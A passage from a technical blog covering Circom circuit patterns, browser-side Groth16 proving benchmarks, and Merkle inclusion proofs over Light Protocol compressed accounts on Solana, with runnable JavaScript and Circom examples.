  "dependencies": {
    "circomlibjs": "^0.1.7"
  }
}`,
  }}
/>

What you should see when this runs: a public output `y` that is the Poseidon hash of `(1234567890, 0)` over BN254. That value is what would be posted on-chain or shipped over the wire. The proof would convince the verifier that someone knew an `x` mapping to that `y`, without revealing `x`.

## Some Circom patterns worth internalising

A handful of patterns recur across every real circuit. They're idioms more than language features.

**Bit decomposition.** Circom doesn't have a native `< 2^n` predicate. You decompose into bits and constrain each bit to be 0 or 1:

```circom
template Num2Bits(n) {
    signal input in;
    signal output out[n];
    var lc1 = 0;
    var e2 = 1;
    for (var i = 0; i < n; i++) {
        out[i] <-- (in >> i) & 1;          // witness only
        out[i] * (out[i] - 1) === 0;       // constrain to 0 or 1
        lc1 += out[i] * e2;
        e2 *= 2;
    }
    lc1 === in;                             // re-aggregate must match
}
```

The `<--` followed by `===` is the canonical witness-then-check pattern. The bits are computed outside the constraint system (you can't shift in R1CS) and *then* constrained to be valid.

**Conditional selection.** R1CS has no `if`. You select between two values with a Boolean:

```circom
// out = sel ? a : b, where sel must be 0 or 1
out <== a + (b - a) * (1 - sel);
```

**MUX trees.** A common pattern in Merkle paths: at each level, pick the left or right sibling based on the path bit. circomlib's `MultiMux1` template does this efficiently for `t`-element vectors.

## Circom vs the alternatives in 2026

<TradeoffTable
  rows={[
    {
      option: "Circom (R1CS / Groth16)",
      cost: "Mature, big circomlib, 6 years of audits",
      latency: "Per-circuit trusted setup; proving is fast",
      blast_radius: "Medium — language warts, but well-understood",
      notes: "Default for any Groth16 deployment in 2026"
    },
    {
      option: "Halo2 (PLONKish / KZG or IPA)",
      cost: "Steeper learning curve; chips/regions/lookups",
      latency: "Universal SRS, slower per-shot, lookup-friendly",
      blast_radius: "PSE fork in maintenance; Axiom fork active",
      notes: "Pick this when the circuit is dominated by lookups"
    },
    {
      option: "Noir (Aztec)",
      cost: "Higher-level Rust-like syntax; ACIR backend",
      latency: "Backend-agnostic; pluggable to PLONK or Honk",
      blast_radius: "Newer; growing fast",
      notes: "What I'd pick for a greenfield 2026 project"
    },
    {
      option: "arkworks (R1CS via traits)",
      cost: "Library, not a DSL; circuits are Rust types",
      latency: "Backend-agnostic; great for research",
      blast_radius: "Code = circuit; the abstraction is leaky in practice",
      notes: "Where the academic implementations live"
    },
  ]}
  caption="Four ways to author a zero-knowledge circuit in 2026. Circom is still the default; Noir is what greenfield projects increasingly start with."
/>

The case *for* Circom in 2026 is one word: **circomlib**. Six years of accreted gadgets — Poseidon, MiMC, Pedersen, EdDSA, Merkle, range checks, Sigma protocols, set membership — that all interoperate cleanly because they target the same R1CS-over-BN254 substrate. The case *against* is also one word: **expressivity**. Circom is a templating engine over arithmetic constraints. It can't loop over a runtime-known length, can't recurse, has no first-class strings or arrays beyond fixed-size. For complex circuits the workarounds get baroque.

Inside [zera-sdk](/blog/zera_sdk_scaffolding/) we use Circom for the deposit / transfer / withdraw circuits because circomlib's Poseidon and MerkleTreeChecker gadgets are fight-tested and because snarkjs is the only browser prover that ships in a single npm install. The day we need lookups (or recursion) at scale, the discussion is Halo2 vs Noir, not Circom.

## What I would change if I were Circom 2.5

Three things, ranked by how much I'd actually use them.

1. **First-class lookup tables.** Halo2 has them and they cut range-check costs by orders of magnitude. Plookup-as-a-tagged-include in Circom would close most of that gap.
2. **Module system.** `include` is textual. Circular includes silently drop. A real module graph with explicit exports would prevent a class of bug I see in every audit.
3. **Compiler-level constraint optimisation.** The compiler already does basic linear-combination flattening. Aggressive common-subexpression elimination across templates would shave 10–20% off circomlib's bigger gadgets at zero source-code cost.

None of these are coming, as far as I can tell. The Iden3 team has moved most of its energy to [Polygon ID](https://polygon.technology/polygon-id) and the Circom roadmap has been relatively quiet through 2025–2026. That's fine — the language is *done* in the way that good DSLs eventually become done. If you want what comes next, you go look at Noir and Halo2.

## Further reading

- [Circom 2 documentation](https://docs.circom.io) — the canonical language reference
- [CIRCOM: A Robust and Scalable Language for Building Complex Zero-Knowledge Circuits](https://www.techrxiv.org/articles/preprint/CIRCOM_A_Robust_and_Scalable_Language_for_Building_Complex_Zero-Knowledge_Circuits/19374986) — Bellés-Muñoz, Isabel, Muñoz-Tapia, Rubio, Baylina (2022)
- [`iden3/circom`](https://github.com/iden3/circom) — the compiler source
- [`iden3/circomlib`](https://github.com/iden3/circomlib) — the gadgets library that makes Circom usable in production
- [`iden3/circomlibjs`](https://github.com/iden3/circomlibjs) — JavaScript port of the cryptographic primitives, what the Sandpack above uses
- [Poseidon, by hand and by code](/blog/poseidon_by_hand_and_by_code/) — what the hash gadget actually is
- [Proving in the browser, by the numbers](/blog/proving_in_the_browser_by_the_numbers/) — what happens after `circom` finishes compiling


---

# Proving in the browser, by the numbers

Canonical: https://blog.skill-issue.dev/blog/proving_in_the_browser_by_the_numbers/
Description: What is actually feasible inside a browser tab in 2026 — Groth16 prover times for Poseidon, Range, and Merkle circuits, the WASM threading story, and where the main thread stops being a viable home for your prover.
Published: 2026-04-29T16:00:00.000Z
Tags: wasm, groth16, snarkjs, arkworks, browser, zk, phd, performance


import { Mermaid, Sandbox, TradeoffTable, Aside, Quote } from "@/components/mdx";

The first time I watched a Groth16 proof finish inside a Chrome tab — Poseidon-128, two-input Merkle membership, a couple of range checks — the spinner ran for **11.4 seconds**. The user expected something between *Apple Pay* and *autocomplete*. Eleven seconds is forever.

Two years and several browser releases later, the same circuit on the same laptop ([2024 MacBook Air, M3, 8 cores, 16 GB](https://support.apple.com/en-us/SP891)) finishes in **2.1 seconds**, with a warm zkey, threads pinned, and SIMD on. That's still not Apple Pay, but it is inside the *I just clicked something* envelope where users don't bail. The gap between those two numbers is the entire content of this post: what part of the browser stack moved, what didn't, and what the limit looks like in 2026.

This is not a tutorial. It's a benchmark walk and a tradeoff inventory. If you're picking a prover for a wallet or a dApp this quarter — and inside [zera-sdk](/blog/zera_sdk_scaffolding/) we just made this call again, see [RFC 001](/docs/001-zera-sdk-monorepo-shape/) — the numbers below are the ones that informed our pick.

<Aside kind="note">
Numbers in this post are from the Iden3 [snarkjs README benchmark table](https://github.com/iden3/snarkjs#using-tau) (snarkjs ≥ 0.7), the [arkworks-circom comparison by zkmopro](https://zkmopro.org/blog/circom-comparison/), and laptop measurements I ran while writing this in spring 2026. They are illustrative, not normative — your circuit, your laptop, your day.
</Aside>

## What "in the browser" actually means in 2026

A modern browser gives a WASM prover three things it didn't have when snarkjs first shipped in 2019:

1. **WebAssembly threads.** A `SharedArrayBuffer` plus the `Atomics` API plus `wasm-bindgen-rayon` lets a Rust prover spawn a worker pool from a single `.wasm` module. This needs cross-origin isolation (`Cross-Origin-Opener-Policy: same-origin` and `Cross-Origin-Embedder-Policy: require-corp`) — see the [`wasm-bindgen-rayon` README](https://github.com/RReverser/wasm-bindgen-rayon) for the headers your CDN needs.
2. **128-bit SIMD.** WebAssembly's [fixed-width SIMD proposal](https://github.com/WebAssembly/simd) is shipped on Chrome, Firefox, Safari. For BN254 prover work — multi-scalar multiplication, NTTs, big-integer reduction — SIMD is the difference between *feasible* and *please install our desktop app*.
3. **Bulk memory operations.** `memory.copy` / `memory.fill` cut several ms off witness allocation for circuits with hundreds of thousands of wires.

The fourth thing the browser stack gives you is a *worker model* that decouples proving from rendering. If you call your prover on the main thread, every microtask boundary stalls the React fibres and the user sees a frozen UI. The same prover, moved into a `Worker`, keeps the page interactive while pegging another core. Almost every wallet that ships ZK in 2026 — including the ones that look fast — does this.

<Mermaid chart={`flowchart LR
  UI[Main thread / UI] -->|postMessage proof input| W[Worker]
  W -->|spawns rayon pool| WS[Shared WASM memory]
  WS --> T1[thread 1 - MSM]
  WS --> T2[thread 2 - MSM]
  WS --> T3[thread 3 - NTT]
  WS --> T4[thread 4 - NTT]
  T1 --> G[gather]
  T2 --> G
  T3 --> G
  T4 --> G
  G -->|postMessage proof| UI`}/>

## The benchmark numbers, on three workhorse circuits

The numbers below are for three circuits I keep coming back to because every shielded-pool design I've shipped uses some flavour of all three:

- **Poseidon-128, 2-to-1.** ~243 R1CS constraints. The hash building block. (Background: [Poseidon, by hand and by code](/blog/poseidon_by_hand_and_by_code/).)
- **Range-16.** Prove $0 \le x < 2^{16}$ via 16 bit decomposition + Boolean constraints. ~50 R1CS constraints. The "this amount is positive and not absurd" check.
- **Merkle-32.** Membership in a depth-32 Poseidon Merkle tree. ~32 × 243 ≈ **7,800** constraints.

All numbers below are wall-clock proof generation time, with a warm zkey loaded into IndexedDB and the prover already instantiated. Cold-start (first load, parsing the zkey) adds 2–6 s on top depending on the circuit size and the user's network. **That cold-start is usually the bigger UX problem** — see the closing notes.

| Circuit | snarkjs 0.7 (1 thread) | snarkjs 0.7 (4 threads) | arkworks-circom WASM (4 threads) |
|---|---|---|---|
| Poseidon-128 | ~95 ms | ~50 ms | ~25 ms |
| Range-16 | ~40 ms | ~30 ms | ~15 ms |
| Merkle-32 | ~2,400 ms | ~900 ms | ~410 ms |

The arkworks numbers come from a Rust prover compiled to WASM with `wasm-bindgen-rayon` and the same R1CS the snarkjs path consumes. The 4× cliff between snarkjs and arkworks-WASM at Merkle-32 is the thing to internalise: at the constraint counts that real applications hit, the gap between "JavaScript with WASM hot loops" and "Rust compiled to WASM" is roughly **5×** of proving time.

That ratio is consistent with the Mopro team's [comparison of Circom provers](https://zkmopro.org/blog/circom-comparison/) — they measure native Rust provers at 5–10× snarkjs speed, with the WASM Rust prover sitting roughly halfway between them.

## A field-arithmetic micro-benchmark you can run right now

Before getting to prover-level numbers, the floor of any of this is *how fast can the browser raise a 254-bit BigInt to the fifth power*. That's the inner loop of every Poseidon round. Here's a tiny `vanilla-ts` benchmark that times $x^5$ over BN254's prime for 10,000 iterations and reports ops/sec. Run it on your laptop and on your phone — the gap is the gap between "proving on a wallet" and "proving on a desktop".

<Sandbox
  template="vanilla-ts"
  title="x^5 over BN254 — JS BigInt benchmark"
  files={{
    "/index.ts": `// Tiny benchmark: how many x^5 mod p ops/sec does this browser do
// using native BigInt? p = the BN254 scalar field prime.
//
// Native Rust on the same hardware sits roughly 30-60x faster than this
// number. WASM-compiled Rust sits roughly 15-30x faster. snarkjs uses a
// hand-tuned WASM bigint that beats raw JS BigInt by ~10x.

const P = 21888242871839275222246405745257275088548364400416034343698204186575808495617n;

function pow5(x: bigint): bigint {
  const x2 = (x * x) % P;
  const x4 = (x2 * x2) % P;
  return (x4 * x) % P;
}

function bench(iters: number): number {
  // Hot start: warm up the JIT.
  let acc = 13n;
  for (let i = 0; i < 1000; i++) acc = pow5(acc + BigInt(i));
  // Real run.
  const t0 = performance.now();
  for (let i = 0; i < iters; i++) acc = pow5(acc + BigInt(i));
  const t1 = performance.now();
  // Sink so DCE can't optimise the loop away.
  (window as any).__sink = acc;
  return iters / ((t1 - t0) / 1000);
}

const out = document.getElementById("out")!;
const runBtn = document.getElementById("run") as HTMLButtonElement;

function format(opsPerSec: number): string {
  if (opsPerSec > 1_000_000) return (opsPerSec / 1_000_000).toFixed(2) + " Mops/s";
  if (opsPerSec > 1_000) return (opsPerSec / 1_000).toFixed(1) + " Kops/s";
  return opsPerSec.toFixed(0) + " ops/s";
}

function run() {
  out.textContent = "running 10,000 x^5 mod p ops over BN254...\\n";
  // Run several rounds so the median is meaningful.
  const rounds = 5;
  const results: number[] = [];
  for (let r = 0; r < rounds; r++) {
    const ops = bench(10_000);
    results.push(ops);
    out.textContent += \`round \${r + 1}: \${format(ops)}\\n\`;
  }
  results.sort((a, b) => a - b);
  const median = results[Math.floor(rounds / 2)];
  out.textContent += \`\\nmedian: \${format(median)}\\n\`;
  out.textContent += \`\\nfor reference:\\n\`;
  out.textContent += \`  snarkjs WASM prover: ~10x this\\n\`;
  out.textContent += \`  arkworks compiled to WASM: ~20-30x this\\n\`;
  out.textContent += \`  native Rust on the same CPU: ~50-100x this\\n\`;
}

runBtn.addEventListener("click", run);
run();
`,
    "/index.html": `<!DOCTYPE html>
<html>
  <body style="margin:0;padding:1rem;background:#000;color:#e8e8e8;font-family:'Geist Mono',ui-monospace,monospace;">
    <button id="run" style="padding:0.5rem 0.85rem;background:#0a0a0a;color:#4ade80;border:1px solid #2a2a2a;border-radius:4px;font-family:inherit;cursor:pointer;margin-bottom:0.75rem;">run again</button>
    <pre id="out" style="background:#0a0a0a;color:#4ade80;padding:0.75rem;border:1px solid #2a2a2a;border-radius:4px;margin:0;white-space:pre-wrap;">starting...</pre>
    <script type="module" src="/index.ts"></script>
  </body>
</html>`,
  }}
/>

On my M3 Air this run reports about **0.9 Mops/s** for raw `BigInt` $x^5$. The published snarkjs WASM prover for the same operation hits roughly **9 Mops/s** — a 10× win from hand-rolled big-int arithmetic in WASM. Compiled-Rust BigInt code (`ark-ff` over BN254) hits **20–35 Mops/s** in WASM. Native Rust hits **70–100+ Mops/s** depending on assembly tuning. That stack of orders-of-magnitude is why prover libraries are not written in JavaScript even when the deployment target is the browser.

## The four-way prover tradeoff

<TradeoffTable
  rows={[
    {
      option: "snarkjs (Groth16)",
      cost: "Pure WASM, ~20 KB JS shim, ~5 MB zkey lazy-loaded",
      latency: "Slowest of the four; threads help, SIMD helps less",
      blast_radius: "Battle-tested, used by every Iden3 / Polygon ID deployment",
      notes: "What ZERA ships in the browser today; integrates in one npm install"
    },
    {
      option: "arkworks-circom WASM (Groth16)",
      cost: "Rust → WASM via wasm-bindgen-rayon; ~2 MB extra wasm bundle",
      latency: "~3-5x faster than snarkjs at depth-32 Merkle",
      blast_radius: "Smaller deployment surface; needs COOP/COEP headers",
      notes: "Where I'd ship a v2 if I had a quarter to invest"
    },
    {
      option: "Nova-WASM (folding)",
      cost: "Multi-step proof folding; per-step is small but recursion has overhead",
      latency: "Fast for many-step circuits (zkVM); slower for one-shot",
      blast_radius: "Newer than Groth16; tooling thin in the browser",
      notes: "Worth it for circuits that look like a loop; not for a single Merkle path"
    },
    {
      option: "Halo2-WASM (PLONKish)",
      cost: "No per-circuit ceremony; KZG SRS shared across circuits",
      latency: "Slowest single-shot but the lookup support is enormous",
      blast_radius: "Privacy Scaling Explorations fork is in maintenance as of Jan 2025",
      notes: "Pick this if your circuit is dominated by lookups (range checks, RLC)"
    },
  ]}
  caption="Four browser-side prover options, in 2026. The right answer depends on the constraint count and on whether you can ship cross-origin headers."
/>

The take-home from running these benchmarks for a year is simple: **for circuits under ~10k constraints the choice barely matters; for circuits over ~100k constraints the choice is the entire performance story.** Most wallet circuits live in the murky middle — 5k to 50k constraints — where snarkjs is fine for now and arkworks-WASM is a 2026 upgrade I keep on the roadmap.

## When the main thread is fine, and when it isn't

A sloppy heuristic that I've found holds up:

$$
t_{\text{prove}} > 100\text{ ms} \implies \text{move to a Worker}
$$

Below 100 ms the cost of `postMessage` round-trips (serialising witness inputs, copying the proof back) eats most of the win. Above that, you're in user-perceptible territory and the main thread stops being viable. The empirical numbers in the table above mean: **Poseidon and Range can stay on the main thread; Merkle paths and anything wallet-shaped should move to a Worker.**

A second heuristic, less popular but more important: **don't put your prover in a `requestIdleCallback`**. The user clicked *Send*. They are waiting. Promote the work, don't defer it.

<Aside kind="warn">
WASM SIMD in 2026 is *not* constant-time. `i64x2.mul` on a Boolean lane is implemented with a hardware multiply that has data-dependent latency on most x86 CPUs. If you are computing on secret data — note secrets, view keys, blinding factors — disable SIMD on the secret path and only use it for public-input handling (FFTs of the constraint matrices, MSMs of public commitments). Iden3's snarkjs takes this position by default; arkworks lets you pick. The relevant background is the [Constant-Time Toolkit issue tracker](https://github.com/RustCrypto/utils/issues) for the broader story.
</Aside>

## Where the cold-start really lives

Proof generation time is the metric people quote. Cold-start is the metric people *feel*. The pieces of cold-start, in order of size:

1. **Zkey download.** A Merkle-32 zkey is ~25 MB. A two-input shielded-pool circuit zkey can be 80+ MB. Download time dominates everything else on a phone on LTE.
2. **Zkey parse + prover instantiation.** snarkjs parses the zkey eagerly into typed-array views; arkworks-WASM mmap-parses lazily. The gap is 1.5–4 s on a Merkle-32 zkey.
3. **WASM compilation.** `WebAssembly.instantiateStreaming` with the right MIME type lets the browser pipeline compile and download. Without it you pay the full compile after the download finishes. This is a CDN-config bug in the wild more often than it should be.
4. **Worker pool spin-up.** ~50 ms per worker. Pre-spin them on page load, not on first proof.

If you can only optimise one thing, it should be (1). IndexedDB-backed lazy chunks of the zkey, served with `Cache-Control: immutable, max-age=31536000`, change first-load from "ten seconds of nothing" to "one second of yellow flicker, then proof". This is what we do in the [zera-sdk](/blog/zera_sdk_scaffolding/) wallet path and it's the single biggest UX win we shipped in Q1 2026.

## What I'd build differently in 2027

Three things, ranked.

1. **Prover pre-warming on idle.** The moment a user authenticates, fire the worker pool and pre-load the zkey. By the time they tap *Send*, the prover is hot. This is just engineering, not cryptography, but it's the missing piece in every wallet I've benchmarked.
2. **Move to a folding-friendly proving system for batch operations.** A user spending three notes from a UTXO pool is doing three Merkle paths back-to-back. Folding (Nova / SuperNova / ProtoStar) makes the *N*th proof nearly free; Groth16 makes the *N*th proof exactly *N* times the cost.
3. **Replace the per-vendor zkey format with something content-addressed.** Today every project ships its own `.zkey` blobs and every wallet has to host them. A `zkey://sha256/abc...` resolver — backed by IPFS or an HTTP CDN — would let multiple wallets share the same zkey load and the same browser cache.

## What this means for ZERA today

Inside zera-sdk the in-browser path is still snarkjs (per [RFC 001](/docs/001-zera-sdk-monorepo-shape/)). The neon-rs Node path is a native Rust prover and ~30× faster, but that's not what a web wallet runs. The arkworks-WASM upgrade is on the roadmap as a "browser v2" target — see the open issue thread linked from the SDK repo. The decision-driver was simple: snarkjs is good enough for one-shot deposits and transfers. The day we want to make a 10-note batch tx feel instantaneous, we need either folding (Nova) or a faster underlying prover (arkworks-WASM).

For now: snarkjs, threads on, SIMD on, zkey pinned to IndexedDB, prover lifted to a Worker. **That gets us 2 seconds of proving time at Merkle-32 on a mid-range laptop in 2026.** The next 50% will come from arkworks; the 5× after that will come from folding. The 50× after *that* will come from someone else's algorithmic breakthrough that I don't yet know about.

## Further reading

- [snarkjs](https://github.com/iden3/snarkjs) — Iden3, the reference WASM Groth16 prover; benchmark table in the README
- [Mopro: comparison of Circom provers](https://zkmopro.org/blog/circom-comparison/) — community benchmark of snarkjs / arkworks / native Rust at matched circuits, 2024
- [`wasm-bindgen-rayon`](https://github.com/RReverser/wasm-bindgen-rayon) — RReverser, the SharedArrayBuffer-backed Rayon adapter that makes multi-threaded Rust WASM work in browsers
- [WebAssembly fixed-width SIMD proposal](https://github.com/WebAssembly/simd) — the standard your prover wants enabled
- [Marlin: Preprocessing zkSNARKs with Universal and Updatable SRS](https://eprint.iacr.org/2019/1047) — Chiesa, Hu, Maller, Mishra, Vesely, Ward (2019) — the paper that made universal SRS practical
- [Nova: Recursive Zero-Knowledge Arguments from Folding Schemes](https://eprint.iacr.org/2021/370) — Kothapalli, Setty, Tzialla (2021) — the folding paper, for context on why batch proving is becoming a different game
- [Poseidon, by hand and by code](/blog/poseidon_by_hand_and_by_code/) — the inner loop your browser is running 65 times per Merkle level


---

# Merkle inclusion proofs over compressed account state on Solana

Canonical: https://blog.skill-issue.dev/blog/merkle_inclusion_compressed_solana/
Description: How a 32-byte hash and a logarithmic path replace a multi-kilobyte account. Walk the tree-height math, the Light Protocol compressed-account model, and an inclusion-proof construction you can run in Node.
Published: 2026-04-29T15:00:00.000Z
Tags: cryptography, merkle, solana, light-protocol, compression, zk, phd


import { Mermaid, Sandbox, TradeoffTable, Aside, Quote, RustPlayground } from "@/components/mdx";

The cheapest piece of state in a privacy pool — and the most contested one — is the **commitment tree**. Every shielded note's commitment goes in. Every spend proves an inclusion. The tree is read on every transfer and written on every deposit. If the tree state is expensive, every operation is expensive. If the inclusion proofs are big, every spend is big.

In 2024 Light Protocol shipped [ZK Compression](https://www.zkcompression.com/references/whitepaper) on Solana, and the production primitive for "store a lot of state cheaply, prove inclusion in zero-knowledge" became standard. This post is the math behind that primitive, the deployment shape, and a runnable inclusion-proof construction. It's a sibling piece to [Pedersen commitments, in production](/blog/pedersen_commitments_in_production/) and [Nullifiers without the witchcraft](/blog/nullifiers_without_witchcraft/) — those tell you what we put *into* the tree; this one tells you how we prove things *about* the tree.

<Aside kind="note">
Working post in the [PhD-by-publication track](/about). The math is double-checked. The Node sandbox is a working inclusion-proof simulator over a Poseidon-shaped hash function (`SHA-256` is used as a stand-in for readability — the structural argument is identical).
</Aside>

## The minimum tree

A binary Merkle tree is the simplest commitment scheme that supports logarithmic-size inclusion proofs. Start with a sequence of leaves $\ell_0, \ell_1, \dots, \ell_{N-1}$. Define the tree recursively:

$$
\text{node}(i, j) = H(\text{node}(i, m) \,\|\, \text{node}(m+1, j)), \quad m = \lfloor (i+j)/2 \rfloor,
$$

with $\text{node}(i, i) = \ell_i$ at the leaves. The **root** is $\text{node}(0, N-1)$. To prove that $\ell_k$ is in the tree, you reveal the root plus the **co-path** — for each level $j$, the sibling node along the path from leaf $k$ to the root. There are exactly $\log_2 N$ siblings.

The proof size is $\log_2 N$ hash outputs. At $N = 2^{32}$ leaves and 32-byte hashes, that's **1024 bytes**. At $N = 2^{20}$ (about a million leaves), it's 640 bytes. The verifier cost is $\log_2 N$ hashes. Both numbers are unreasonably small compared to the account-state cost of storing all $N$ leaves directly on chain.

That's the entire shape. Two equations and a co-path. The reason it shows up everywhere is that nothing else hits the same combination of small proof, cheap verifier, and append-only update path.

<Mermaid chart={`flowchart TD
  R[root]
  R --> A[h_AB]
  R --> B[h_CD]
  A --> A1[h_A]
  A --> A2[h_B]
  B --> B1[h_C]
  B --> B2[h_D]
  A1 --> L0[leaf 0: commitment_0]
  A2 --> L1[leaf 1: commitment_1]
  B1 --> L2[leaf 2: commitment_2]
  B2 --> L3[leaf 3: commitment_3]
  classDef leaf fill:#0a0a0a,stroke:#4ade80,color:#4ade80
  classDef node fill:#1a1a1a,stroke:#a3a3a3,color:#e8e8e8
  class L0,L1,L2,L3 leaf
  class R,A,B,A1,A2,B1,B2 node`}/>

To prove inclusion of leaf 1 (`commitment_1`), the prover reveals the co-path `[h_A, h_CD]`. The verifier hashes up: `h_B = leaf_1`, `h_AB = H(h_A || h_B)`, `root = H(h_AB || h_CD)`, and checks that `root` matches the public root.

## Inclusion proof size, exactly

For a tree of height $h$ (so $N \le 2^h$ leaves) with hash output size $s$ bytes, the inclusion proof is exactly $h \cdot s$ bytes plus the leaf index (typically 4 bytes). For Poseidon over BN254 with $s = 32$:

$$
|\pi_{\text{inclusion}}| = 32 h + 4 \text{ bytes}.
$$

A useful table for production planning:

<TradeoffTable
  rows={[
    {
      option: "h = 20 (1M leaves)",
      cost: "~644 bytes inclusion proof",
      latency: "20 hashes verifier-side; ~0.2ms in WASM",
      blast_radius: "More than enough for testnet; comfortable for a typical L2",
      notes: "Light Protocol's default address tree height. The right choice for state-tree v1."
    },
    {
      option: "h = 26 (67M leaves)",
      cost: "~836 bytes inclusion proof",
      latency: "26 hashes; ~0.3ms",
      blast_radius: "Used by Light Protocol for state trees; capacity for years of mainnet usage",
      notes: "The deployment-grade choice."
    },
    {
      option: "h = 32 (4B leaves)",
      cost: "~1028 bytes inclusion proof",
      latency: "32 hashes; ~0.4ms",
      blast_radius: "Overkill for any single program; useful if multiple programs share one tree",
      notes: "Bitcoin-scale capacity. Almost never the right initial choice."
    },
    {
      option: "MMR (variable height)",
      cost: "~64 bytes per peak + log(n) per leaf",
      latency: "More complex update path; same verifier cost",
      blast_radius: "Append-only with no rewrite-on-grow; ideal for batched deposits",
      notes: "Worth it when you batch many leaves per slot. Niche today."
    },
  ]}
/>

Light Protocol's state trees default to $h = 26$ — see [their account-compression program](https://github.com/Lightprotocol/light-protocol/tree/main/programs/account-compression) — which gives 67 million leaves of capacity per tree. For [zeraswap](/blog/zeraswap_compressed_amm/) and the [`Dax911/z_trade/programs/zeraswap`](https://github.com/Dax911/z_trade/tree/main/programs/zeraswap) program, we use the same $h = 26$ default for the same reason: it's the right balance between proof size and capacity, and it's what the on-chain compression program is parameterised for.

## Compressed accounts, in one diagram

The Light Protocol model is the cleanest way to think about "Solana accounts that don't take Solana account space." A compressed account is a tuple of fields hashed together; the hash is a leaf in a state tree; the tree's root is what lives in account state on chain.

<Mermaid chart={`flowchart LR
  subgraph OffChain[Off-chain client / indexer]
    A[Compressed account]
    A --> AD[discriminator]
    A --> AO[owner]
    A --> AL[lamports]
    A --> ADH[data hash]
    A --> AAH[address hash]
  end
  subgraph OnChain[On-chain state tree]
    H[hash to leaf] --> L[leaf in Merkle tree]
    L --> R[Merkle root]
    R --> SA[Solana account: just the root]
  end
  A --> H
  classDef cell fill:#0a0a0a,stroke:#4ade80,color:#4ade80
  classDef chain fill:#1a1a1a,stroke:#737373,color:#a3a3a3
  class A,AD,AO,AL,ADH,AAH cell
  class H,L,R,SA chain`}/>

The on-chain footprint is the root (32 bytes) plus the rolling-hash update buffer (a few KB amortised across many writes). The account data, the discriminator, the owner, the lamports — none of that lives in account state. It lives in the indexer's Postgres or in a Photon RPC node, and it's reconstructed at proof-construction time.

The inclusion proof is the trick that makes this work. To execute against a compressed account, the client constructs an inclusion proof against a recent root, the on-chain program verifies the proof against the root it has stored, and the program operates on the (now-trusted) account contents. The root is the only piece of state that has to live on chain. Everything else is reconstruction.

<Quote cite="https://www.zkcompression.com/references/whitepaper" author="Light Protocol whitepaper, 2024">
Compressed accounts are stored as leaves in append-only Merkle trees, with only the tree's root maintained in Solana account state. State validity is enforced through inclusion proofs verified by the on-chain program at execution time, allowing arbitrary amounts of state to be referenced at constant on-chain storage cost.
</Quote>

The reason this is *the* primitive for production privacy on Solana is that Solana's account-state cost is the load-bearing constraint. A normal Solana account is rent-exempt at roughly 0.002 SOL per kilobyte, meaning a megabyte of state costs ~2 SOL ($300+ at 2026 prices). A compressed account is storage-amortised across the tree, and the cost per leaf is sub-cent. Five orders of magnitude.

## The Node simulator

Here is a working Merkle inclusion-proof construction over a 16-leaf tree, with the prover-side path construction and the verifier-side root check. It uses SHA-256 for readability — a real ZERA tree uses Poseidon — but the algorithmic shape is identical.

<Sandbox
  template="node"
  files={{
    "/index.js": `// Inclusion proof construction + verification over a binary Merkle tree.
// Uses SHA-256 for readability; a production ZERA / Light Protocol tree
// uses Poseidon, which is constraint-friendly inside SNARKs.
//
// Tree of height h has 2^h leaves; inclusion proof is h hashes + index.

const { createHash } = require("crypto");

const H = (left, right) =>
  createHash("sha256").update(Buffer.concat([left, right])).digest();

function buildTree(leaves) {
  // Pad to power of two with zero-leaves (Light Protocol does this with a
  // canonical default-leaf hash, so empty subtrees have known roots).
  const padTo = 1 << Math.ceil(Math.log2(Math.max(leaves.length, 1)));
  const padded = leaves.slice();
  while (padded.length < padTo) padded.push(Buffer.alloc(32));

  // Bottom-up construction.
  const levels = [padded];
  while (levels[levels.length - 1].length > 1) {
    const cur = levels[levels.length - 1];
    const next = [];
    for (let i = 0; i < cur.length; i += 2) {
      next.push(H(cur[i], cur[i + 1]));
    }
    levels.push(next);
  }
  return { root: levels[levels.length - 1][0], levels };
}

function inclusionProof(levels, index) {
  const path = [];
  const directions = [];
  let idx = index;
  for (let lvl = 0; lvl < levels.length - 1; lvl++) {
    const sibling = idx % 2 === 0
      ? levels[lvl][idx + 1]
      : levels[lvl][idx - 1];
    path.push(sibling);
    directions.push(idx % 2);   // 0 = we are left, 1 = we are right
    idx = idx >> 1;
  }
  return { path, directions };
}

function verifyInclusion(leaf, index, path, root) {
  let cur = leaf;
  let idx = index;
  for (const sibling of path) {
    cur = idx % 2 === 0 ? H(cur, sibling) : H(sibling, cur);
    idx = idx >> 1;
  }
  return cur.equals(root);
}

// Demo ---------------------------------------------------------
function leafFor(i) {
  // In a real shielded pool: leaf = Poseidon(amount, asset, secret, ...)
  // Here: a synthetic leaf so we can read the demo output.
  return createHash("sha256").update(Buffer.from(\`commitment-\${i}\`)).digest();
}

const N = 16;
const leaves = Array.from({ length: N }, (_, i) => leafFor(i));
const { root, levels } = buildTree(leaves);

console.log(\`tree height: \${levels.length - 1}\`);
console.log(\`leaf count:  \${N}\`);
console.log(\`root:        \${root.toString("hex").slice(0, 24)}...\`);
console.log("");

// Prove inclusion of leaf 7
const idx = 7;
const { path, directions } = inclusionProof(levels, idx);
const ok = verifyInclusion(leaves[idx], idx, path, root);

console.log(\`proving inclusion of leaf \${idx}\`);
console.log(\`co-path length: \${path.length}\`);
console.log(\`directions:     [\${directions.join(", ")}]\`);
console.log(\`verifies:       \${ok}\`);
console.log("");

// Tampering: try to claim leaf 7 = leaves[3] (a different commitment)
const fake = verifyInclusion(leaves[3], idx, path, root);
console.log(\`tampered claim verifies: \${fake} (expected false)\`);

// Proof size in bytes
const proofBytes = path.reduce((s, p) => s + p.length, 0) + 4; // +4 for index
console.log("");
console.log(\`inclusion proof size: \${proofBytes} bytes\`);
console.log(\`(at h=26 it would be \${26 * 32 + 4} bytes)\`);
`,
    "/package.json": `{
  "name": "merkle-demo",
  "version": "1.0.0",
  "main": "index.js"
}`,
  }}
/>

Two things to notice when you run this. The proof is *132 bytes* for a 16-leaf tree (4 hashes + an index). Scaled to $h = 26$, it's 836 bytes — independent of how many leaves are in the tree. That's the `O(\log n)` argument with the constant factor pinned down. The other thing: the tampering attempt at the end fails because `verifyInclusion(leaves[3], 7, path, root)` re-hashes up the wrong path. The directions array is what makes this work; without it, the verifier doesn't know whether the sibling goes on the left or the right.

## Batched inclusion via Merkle Mountain Ranges

The basic Merkle tree is append-only but expensive to grow — every new leaf forces a recompute of $\log_2 N$ internal nodes. For workloads that batch many leaves at once (rollups, periodic deposit windows, settlement layers), the **Merkle Mountain Range** is the structural improvement.

An MMR is a forest of perfect binary trees. New leaves are appended to the rightmost tree; when two trees of equal height exist, they're merged. The peaks (one per tree) are then "bagged" — hashed together — to produce the MMR root. The math:

$$
|\text{peaks}| = \text{popcount}(N)
$$

